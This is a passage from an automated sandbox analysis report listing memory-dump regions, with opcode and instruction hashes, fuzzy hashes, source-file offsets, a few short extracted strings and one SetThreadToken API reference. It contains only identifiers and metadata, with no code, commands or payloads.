                                        • Opcode ID: 6419f5d3b42930662c08ccc9a7f3539c17b90f56c7e8212844c3d82f7a47a3ce
                                        • Instruction ID: 97c7a98713ef67b1a7fed513a033550fa9c87574e21980ce69ee6f21a96e6321
                                        • Opcode Fuzzy Hash: 6419f5d3b42930662c08ccc9a7f3539c17b90f56c7e8212844c3d82f7a47a3ce
                                        • Instruction Fuzzy Hash: A8F0B4347042814FC712CB39D098D75BBF69FDA61532900EEE445CB772CA60EC02C750
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f854f9f324537206574a73d41e90e4d8ae00233254a9124a9a44e3cebf146639
                                        • Instruction ID: c488a632e30e66f4c6434e510a669ae2a3f498b6fff3e8dd90e488bfce233e75
                                        • Opcode Fuzzy Hash: f854f9f324537206574a73d41e90e4d8ae00233254a9124a9a44e3cebf146639
                                        • Instruction Fuzzy Hash: 87F0B471A053008FD7218B79D4AC7A6BFE5EB46311F10845DD14DC7283DB3A7841C761
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4efd4b752d00176f4ea0ffa7974e2e95cc493293d593c477943243fb4b13ae3e
                                        • Instruction ID: b4634bb06ff2d96c6d2ced73282031bc8bd3d723485b6b9612475c5dee51f603
                                        • Opcode Fuzzy Hash: 4efd4b752d00176f4ea0ffa7974e2e95cc493293d593c477943243fb4b13ae3e
                                        • Instruction Fuzzy Hash: F3F0A0317047149FD724ABAAE844A7FB7E9EBC8676B00052DE50AD3340DF30BC0287A4
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5fc64b3cb311e13c44ba4e81be377d4de92328d8623f52f809916ee11046904b
                                        • Instruction ID: c1e066882400e536410a08d0a392e0122bec42eb45e666084635ed28d2485ae4
                                        • Opcode Fuzzy Hash: 5fc64b3cb311e13c44ba4e81be377d4de92328d8623f52f809916ee11046904b
                                        • Instruction Fuzzy Hash: D6E092A27063551A6A2572BF4D10ABA79CD8AC75A7B444375852AE72C2DC81FC0783B1
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b8a49192df44eed8d9c9a09b25811ba0b9c42409a90712c05474ddd8f8896557
                                        • Instruction ID: e0545488abdc97b5afdcd480eb760e0bf972428aa2e30bcb4524d96145c64c6f
                                        • Opcode Fuzzy Hash: b8a49192df44eed8d9c9a09b25811ba0b9c42409a90712c05474ddd8f8896557
                                        • Instruction Fuzzy Hash: CCF03039B001148FDB20EB6D9840AAA77E6EFCD65A7154195EA09DB364DE34EC038B91
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 803c82a8e7a06f728bafd16fc6a465fe70d2ace63b864747aaa4fcb6e8dc61b3
                                        • Instruction ID: 0a4818946885b602a5e935bd3b3b2a1bd3e9f21a920f6736fea50da2353951cc
                                        • Opcode Fuzzy Hash: 803c82a8e7a06f728bafd16fc6a465fe70d2ace63b864747aaa4fcb6e8dc61b3
                                        • Instruction Fuzzy Hash: 5FF027317001044BF304BB69D0483AB7BA6DFC4319F20822AC91A47388CE3D3802CBF1
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1bf46c7c64115a95ced416a33a0b68f47fd8eb57c310ea1c465da523125c50af
                                        • Instruction ID: fccbe10c186e0400eb7c51eb407f6d6c7085da63364f5df96bcf42beb0d073d9
                                        • Opcode Fuzzy Hash: 1bf46c7c64115a95ced416a33a0b68f47fd8eb57c310ea1c465da523125c50af
                                        • Instruction Fuzzy Hash: BEE0ED357001118F8710DB1ED494C66B7FAEFCE61631500A9F545CB725DA61EC028B90
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f0cccc6355328abfa24bc2a2e47c1952864b17c9b7e0e26a45f0d5e27365d4ed
                                        • Instruction ID: 7b1abd519816731c0cae1b00a88f9b5ba2ff2281a090b016fb25a098d67e3a69
                                        • Opcode Fuzzy Hash: f0cccc6355328abfa24bc2a2e47c1952864b17c9b7e0e26a45f0d5e27365d4ed
                                        • Instruction Fuzzy Hash: A1F0B235A001099FDB15CB9DD890AEEF7B5FF88324F208199E525A72A1C736E852CB61
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 02782ed2067c84d9631a419c1d4535729d29aeb3984fed454e8b9a8c05210cc5
                                        • Instruction ID: 29a96aba53279b9db717b8f7ca07d31f9ebc3fe87dabb4ed9cc1e4fe3acadb35
                                        • Opcode Fuzzy Hash: 02782ed2067c84d9631a419c1d4535729d29aeb3984fed454e8b9a8c05210cc5
                                        • Instruction Fuzzy Hash: A3E04861F083D51B8F2A966B6C14476BF774AC363230984B7E544CB696ED11BC074355
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f41ae24fde3aa58eb9d349003c05dcfa9945587a78593c448bfb3607dc61d3b9
                                        • Instruction ID: 1387d5b40e571c8fc8bc91669dcbd0d2c8b09bbc1b857058731dbe7795dd9060
                                        • Opcode Fuzzy Hash: f41ae24fde3aa58eb9d349003c05dcfa9945587a78593c448bfb3607dc61d3b9
                                        • Instruction Fuzzy Hash: 8EE0D835B14610DBDB092B75A40C6EE7AA6EBC4726F24802EE60A87346CF795802C3D9
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 869afd16b2ded7b93755289035e2f49fa8449560be59bed126c224742d276c9f
                                        • Instruction ID: b093355bc7b36069bfbc92e5fc34b664cdc28c3a9eb7bbb7b0dcdf679092e893
                                        • Opcode Fuzzy Hash: 869afd16b2ded7b93755289035e2f49fa8449560be59bed126c224742d276c9f
                                        • Instruction Fuzzy Hash: B2E09231915109CFCF0ABBB6D4494B97F70EB01313F1081ADC95693186EA31758BCB81
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 003a191ee91563cb0edf6bb50bbf6c54e777edc735e92a7e5a7cd2ae39b8a606
                                        • Instruction ID: e7d9a94ed9b046772e6a758c75c37ecd2a2700ea246ca7e05ff4540cb580256c
                                        • Opcode Fuzzy Hash: 003a191ee91563cb0edf6bb50bbf6c54e777edc735e92a7e5a7cd2ae39b8a606
                                        • Instruction Fuzzy Hash: 9EF0ED71A003049BD7649FB9D49C79ABBE5EB44311F20442DD55ED7285DB39A881CB90
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2bdc63eb822f26f91df4bb146c89c586f079faf416480f96575e59835275e0a3
                                        • Instruction ID: 5cb7b8fae7d369b90e13fbd90ba12822061fe3de1b8dec438c5d91461532115a
                                        • Opcode Fuzzy Hash: 2bdc63eb822f26f91df4bb146c89c586f079faf416480f96575e59835275e0a3
                                        • Instruction Fuzzy Hash: F7E02035704610D7CB083775A40C2ED7A56EBC4726F10402ED60983346CF78580183D9
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f38403cfdab0060ab2bff2c55a29c074bb057262dc3038e58891009f3785373b
                                        • Instruction ID: f978a6f0ce186d908f63652f910ab0465f44d7989f40118a83f04da3370e8c78
                                        • Opcode Fuzzy Hash: f38403cfdab0060ab2bff2c55a29c074bb057262dc3038e58891009f3785373b
                                        • Instruction Fuzzy Hash: 55D09E52B012651B6A6472BF5D10ABBB5CECAC68E7B4501369A06E7245ED84EC0B43F1
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                        • Instruction ID: 7945aedad52d35ab916905df65817a2d9cae7ccf38b46b4255aada803f72d224
                                        • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                                        • Instruction Fuzzy Hash: C7E08636B00014978B08955AD4144EDF7AADBCC221F04807AD90AA7740DA32691686E1
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a3ed372339ca5f587bf645e86fc4727ce6fd1b3ffa91206e03bc2aa387a28082
                                        • Instruction ID: c8c3a0f7035643d3b02abc1a703473a87a23743dfb20ac2d8cbbc7b048cd58e5
                                        • Opcode Fuzzy Hash: a3ed372339ca5f587bf645e86fc4727ce6fd1b3ffa91206e03bc2aa387a28082
                                        • Instruction Fuzzy Hash: 1CE09A30E1820ACF8B15BF65D446579BFB1EB15346F14C0AADE4897286EA307A42CB80
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d77aa776d0fe133f7134d051a3e9ad4ecac6752006c2a19b06fec634130d3368
                                        • Instruction ID: bc5aaa34a683a270a916f409ecc0f0d94751398113c598c72722889661ec226f
                                        • Opcode Fuzzy Hash: d77aa776d0fe133f7134d051a3e9ad4ecac6752006c2a19b06fec634130d3368
                                        • Instruction Fuzzy Hash: EDE01A70E0564A9FCB80DFADC8825A9FFF0EB49214B5085AEC949EB205E3325652DB91
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                        • Instruction ID: 687dee16fc8dc6ddeecd53c3d874c765711665af91886c93d6622efcf3688f39
                                        • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                                        • Instruction Fuzzy Hash: C2D06271D042099F8780EFADC94156DFBF4EB48200F5085AA891DE7301F7315612DBD1
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 361e7e04825d5ee59d06c75d38a30028afcbad2fd0a3c0c22ebf1b4fceabaf70
                                        • Instruction ID: 1c136e1e60b83db33817849a80da7a454910baf65ed9858c5ac919f565bc5090
                                        • Opcode Fuzzy Hash: 361e7e04825d5ee59d06c75d38a30028afcbad2fd0a3c0c22ebf1b4fceabaf70
                                        • Instruction Fuzzy Hash: 70D01731854109CBCB08BBA5E81A4BDBB74FB00303F51816DD91B52196EA312A8ACAC0
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 430fe8dc203d79bfb4de36d741eb175c2a521a014ed104de51eb3938c09c2265
                                        • Instruction ID: 3abc9519f1ac089e6fbb3f720d225f6da8a7972b95d54206c7e915ea5dd90e0c
                                        • Opcode Fuzzy Hash: 430fe8dc203d79bfb4de36d741eb175c2a521a014ed104de51eb3938c09c2265
                                        • Instruction Fuzzy Hash: 99D01730E4820ACB8B08EFA8E44686EBBB5EB44202F10816ADE0993345EA306941CBC1
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 43ceefec4342efb83657a150450eb2fa4f223db3b24cd8bb7e610932fec85e9a
                                        • Instruction ID: b0bfe25cf32abe0eda4d1d66716993bdf3fa8ae9297aa537bb50c4a6000a49c1
                                        • Opcode Fuzzy Hash: 43ceefec4342efb83657a150450eb2fa4f223db3b24cd8bb7e610932fec85e9a
                                        • Instruction Fuzzy Hash: 32C048326863008FEF0EAA2488663167AA2AB82701F0289988003C6060CAB844008A24
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0fe43dd880459abc3e40153b42e59b9ce320c386c011bbfb71a6240984f263a7
                                        • Instruction ID: bea90eca68c2ce075a0a807a1c1082b5e0d927b149561082a9638912c292e5a1
                                        • Opcode Fuzzy Hash: 0fe43dd880459abc3e40153b42e59b9ce320c386c011bbfb71a6240984f263a7
                                        • Instruction Fuzzy Hash: F8C08C30004B08CFC6183F3894018083F69EB44321341049CE40B1A2A38A35A841CA10
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7e3a6a500b9ba63ecd3f64c578d3088cff80dfc95796c7c1d652144f35a3eac9
                                        • Instruction ID: 745af3a7f2e5800ebfe4b5aae9007358e6c0c8095801a4c25377b894245cc203
                                        • Opcode Fuzzy Hash: 7e3a6a500b9ba63ecd3f64c578d3088cff80dfc95796c7c1d652144f35a3eac9
                                        • Instruction Fuzzy Hash: 52B09231049B088FC2586F79A404818772AAB4432538004ACE80E0A2928E36E885CA44
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2023765064.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: 84l$84l$]$Jl$Jl$Jl$Jl$Jl$rl$rl
                                        • API String ID: 0-2561396418
                                        • Opcode ID: 271256f42a25b526954af3ae0011b6580b14c2abbf71a4942d5a57c394a147fb
                                        • Instruction ID: 30c6da9d648b279dd364266a534c3b6680da07ff29f07740ccb89bf3317d21f2
                                        • Opcode Fuzzy Hash: 271256f42a25b526954af3ae0011b6580b14c2abbf71a4942d5a57c394a147fb
                                        • Instruction Fuzzy Hash: B6D149B1B0434ACFC765AB6984017A6BBF5EFC6215F2884AFC915CF256DB31C842C7A1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: 3n^$3n^$3n^$3n^$3n^
                                        • API String ID: 0-3808966400
                                        • Opcode ID: c991fb1356a101fc3aeb271a71583417e4c6e4ab2f421a0da12cac8e9897aa91
                                        • Instruction ID: 10cce3bd736ef75f0517f9179747032366ea13e64c79ff0cf8058e2595556509
                                        • Opcode Fuzzy Hash: c991fb1356a101fc3aeb271a71583417e4c6e4ab2f421a0da12cac8e9897aa91
                                        • Instruction Fuzzy Hash: 9F31E71654E3C21FC30B9B3988A85957F76AEB359471E01DBC1C8CF0E3D919581BCB9A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.1953922091.0000000004FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FE0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: 3n^$3n^$3n^$3n^
                                        • API String ID: 0-1318641411
                                        • Opcode ID: 02b659d24530412a93487d5e59ae619bbb6eca02d8d473d379306ba354951d8a
                                        • Instruction ID: 4eca8796911ba53ef497105923b9789b44a42e4649060e8be3e80d6426508750
                                        • Opcode Fuzzy Hash: 02b659d24530412a93487d5e59ae619bbb6eca02d8d473d379306ba354951d8a
                                        • Instruction Fuzzy Hash: 9E41A021A0D3C15FD3139B3CD8A4A917FB1AF97554B0A40DBD0C8CF2A3DA24AC1AC796
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000016.00000002.2023765064.0000000007980000.00000040.00000800.00020000.00000000.sdmp, Offset: 07980000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID: Jl$Jl$Jl$Jl
                                        • API String ID: 0-515501743
                                        • Opcode ID: 6f3d5b066872e209932e091cd83c75601e50ab5d671deae90c71cf3868cd162f
                                        • Instruction ID: 1e13231164298c19ce267910643e86aa2515ce39c5cf60c07390aee50abb5627
                                        • Opcode Fuzzy Hash: 6f3d5b066872e209932e091cd83c75601e50ab5d671deae90c71cf3868cd162f
                                        • Instruction Fuzzy Hash: 962125B1A0D3E15FC35B53640822B623F753F83214F2A85DBC1909F6A3C8688C46C3A7
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 631c9575b8cc3f3959ea99ef936201eabddfc7e691f2c476a13c1208710f76e9
                                        • Instruction ID: 32679d864ef05b817154c8a1b591b97b30d3aa6115f08494a5e70708367684ff
                                        • Opcode Fuzzy Hash: 631c9575b8cc3f3959ea99ef936201eabddfc7e691f2c476a13c1208710f76e9
                                        • Instruction Fuzzy Hash: A1915470F017289BDB29EFB884606AEBBF2EF84700B40891DD516AB340DF7859068BD5
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b82e2ab0e79ad92e91193a92db3b35611b3b799395ccdead58312d31bc46b285
                                        • Instruction ID: 0219e949222b118bf7abf41580d9ab2b68bf191f01809b3e6ae497d934070155
                                        • Opcode Fuzzy Hash: b82e2ab0e79ad92e91193a92db3b35611b3b799395ccdead58312d31bc46b285
                                        • Instruction Fuzzy Hash: 01914371F007289BDB29EFB984106AEBBF2EF84700B40891DD516AB780DF7859068BD5
                                        APIs
                                        • SetThreadToken.KERNELBASE(EFD808A4), ref: 08F968A2
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.2041680799.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                        Similarity
                                        • API ID: ThreadToken
                                        • String ID:
                                        • API String ID: 3254676861-0
                                        • Opcode ID: dcc39adfb3a5fb8737e8ccc881783281e9505408c65c9513dcc3c58061083675
                                        • Instruction ID: efbe127756e0961cc1e0bca25aca2d1d1bae6597aed058c976e5cec01fd032cf
                                        • Opcode Fuzzy Hash: dcc39adfb3a5fb8737e8ccc881783281e9505408c65c9513dcc3c58061083675
                                        • Instruction Fuzzy Hash: BC1125B5D003088FDB20DFAAC885B9EFBF4EF48324F24841AD458A7210D778A945CFA0
                                        APIs
                                        • SetThreadToken.KERNELBASE(EFD808A4), ref: 08F968A2
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.2041680799.0000000008F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F90000, based on PE: false
                                        Similarity
                                        • API ID: ThreadToken
                                        • String ID:
                                        • API String ID: 3254676861-0
                                        • Opcode ID: 111e585c58820765073bf2872807abc14eb6bcb3ac138f4395e66f025b9e506a
                                        • Instruction ID: 3611f8ba5ba7c9215f96c4fbe713d2e654ca4781bde435fafa26bb17222f4094
                                        • Opcode Fuzzy Hash: 111e585c58820765073bf2872807abc14eb6bcb3ac138f4395e66f025b9e506a
                                        • Instruction Fuzzy Hash: 791116B5D002488FDB20DFA9C584B9EFBF5EF88314F24841AD458A7250D774A945CFA0
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.2033428635.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0521c9567cfc8411224dfde2533c26fbb35708074e8158f38548d589d85f7977
                                        • Instruction ID: 6d2603baba7923ea91e0f6b5116c3ad6f7a1a3ef1d2b267e0cf7f2fff9c76819
                                        • Opcode Fuzzy Hash: 0521c9567cfc8411224dfde2533c26fbb35708074e8158f38548d589d85f7977
                                        • Instruction Fuzzy Hash: 29B16AB1B00326EFD7259B79C8417AABBF2BFC9216F14806AD505CB291DB30DE41C7A1
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4e4af11a418a32547f644ad93d8c71ba70a9b2ea68173866c438c3cc2e1ac93f
                                        • Instruction ID: 9869697277bb7a462cb2134a2657d253fabf74e7bd2edbb8981849373de11fe4
                                        • Opcode Fuzzy Hash: 4e4af11a418a32547f644ad93d8c71ba70a9b2ea68173866c438c3cc2e1ac93f
                                        • Instruction Fuzzy Hash: 59917F74A00609DFCB25CF59C494ABEFBB1FF49310B248559E815AB365C73AEC91CBA0
                                        Memory Dump Source
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 044593a93b57943a0e8e8027f053cd19291259f244ffd2a0dfc1d44a20289d51
                                        • Instruction ID: a329f4fb2f7b107f26090ac0425b8e7fff8a8a90779ba881e5a3c420b014ff27
                                        • Opcode Fuzzy Hash: 044593a93b57943a0e8e8027f053cd19291259f244ffd2a0dfc1d44a20289d51
                                        • Instruction Fuzzy Hash: 07F0F631B042404FD355AB28D05C3AB7FA1DFC5315F14819FC4168B786CE3D1846CBA1
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: fb0aaa1d0a7a858b1be85c6d11eedfed6bd38c48cb090e79b8f79a8bc43e5fd1
                                        • Instruction ID: 4648af7f54bef9de827f82076b77796726a65d9395dd760b5defbe3d4c691153
                                        • Opcode Fuzzy Hash: fb0aaa1d0a7a858b1be85c6d11eedfed6bd38c48cb090e79b8f79a8bc43e5fd1
                                        • Instruction Fuzzy Hash: D8F0A771B007189FD724975AE848D6FB7E9EBCA261B00092DE10AD3340DF74AC018BA0
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1954599640.000000000530D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0530D000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 659d6dc3bd43fbfc3ad7ea6957330f09e1fdc1cacd3411969ed761001def81fa
                                        • Instruction ID: eb89b86f75ca5effe167dd131c35876e45fc729a335a381a1c95e716303355f7
                                        • Opcode Fuzzy Hash: 659d6dc3bd43fbfc3ad7ea6957330f09e1fdc1cacd3411969ed761001def81fa
                                        • Instruction Fuzzy Hash: 90F04975104A40AFD724CF06CD85D23BBBAEB85620B198489F85A4B352C671FC02CBA0
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: af6bb5b1a927903514167185ec78abe5443a09d9504111fbd9e9eada160956e6
                                        • Instruction ID: 499262e72db357dbcecc6ae136c11a51bad3a7742f2199752366fa884ffd1ae3
                                        • Opcode Fuzzy Hash: af6bb5b1a927903514167185ec78abe5443a09d9504111fbd9e9eada160956e6
                                        • Instruction Fuzzy Hash: 37F0A7313003046BC714A725D89495FB796EFC1655B409A3DD10E9F750DF75BC068BE0
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 00a0daed32f681fe26dd284fde187281d6c1fe69b5b44f24e92668bde0f0c9e1
                                        • Instruction ID: 8aa73bb473b5a66a79fed440d26e7b27a4ed3ec5b5c00d25eadcbe808a238aa5
                                        • Opcode Fuzzy Hash: 00a0daed32f681fe26dd284fde187281d6c1fe69b5b44f24e92668bde0f0c9e1
                                        • Instruction Fuzzy Hash: 79F03079B002188FDB20EBADA850AAA77F3FBCD6557158159E90ADB314DF74DC024B90
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 42fe75813480845ca0d400df6a94b3bcf185437b5c17e5e21fc5b7648e19a77e
                                        • Instruction ID: 96a3af7b0cb1ffe56255d08973435ac8a0bc310d1fd20af1ccf0e8fb1f6add29
                                        • Opcode Fuzzy Hash: 42fe75813480845ca0d400df6a94b3bcf185437b5c17e5e21fc5b7648e19a77e
                                        • Instruction Fuzzy Hash: CFF05E71A093404FD7619B78E8EC79ABFF1EB06310F1448AEE55ADB282CB786885C751
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 49d74bcd95552e1a8dc6bc0bfedf3f9147fb0ad131b13a8e4906ea5ccb1947c7
                                        • Instruction ID: bb2679b63ba8abbc82d1b5f36918af9275042526294ec0a84415f58745a60efd
                                        • Opcode Fuzzy Hash: 49d74bcd95552e1a8dc6bc0bfedf3f9147fb0ad131b13a8e4906ea5ccb1947c7
                                        • Instruction Fuzzy Hash: A6F02731B002044BD354BB68D01C3AFBBA6DBC4315F10812AC90A4BB84DE3D2C46C7E1
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 303fa84fbbbe6b662cefb50861ef68af4181b7434a11c87e9901552dfee1af91
                                        • Instruction ID: 2adf98fa7ae81f73edd2d3812148a26919149a96061a2e51c26aad0c1beeb88c
                                        • Opcode Fuzzy Hash: 303fa84fbbbe6b662cefb50861ef68af4181b7434a11c87e9901552dfee1af91
                                        • Instruction Fuzzy Hash: 43F0EC3560ABD05FC313932D681089F7FE59DC7171314459ED045CB552C9B59C0687E2
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cb5dbcf2736e32bf1d680c7e2c4e6a291cce61cc89606172ff192e241525dc03
                                        • Instruction ID: 16adb20f5898834f96e2dc67b137444c8b1271c0ab06f41e24580141e55c17d5
                                        • Opcode Fuzzy Hash: cb5dbcf2736e32bf1d680c7e2c4e6a291cce61cc89606172ff192e241525dc03
                                        • Instruction Fuzzy Hash: 0EE012357001158F87109B2ED454D66B7FAEFCE61531510A9F545DF331DE61EC019B94
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.1955384665.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                        Similarity
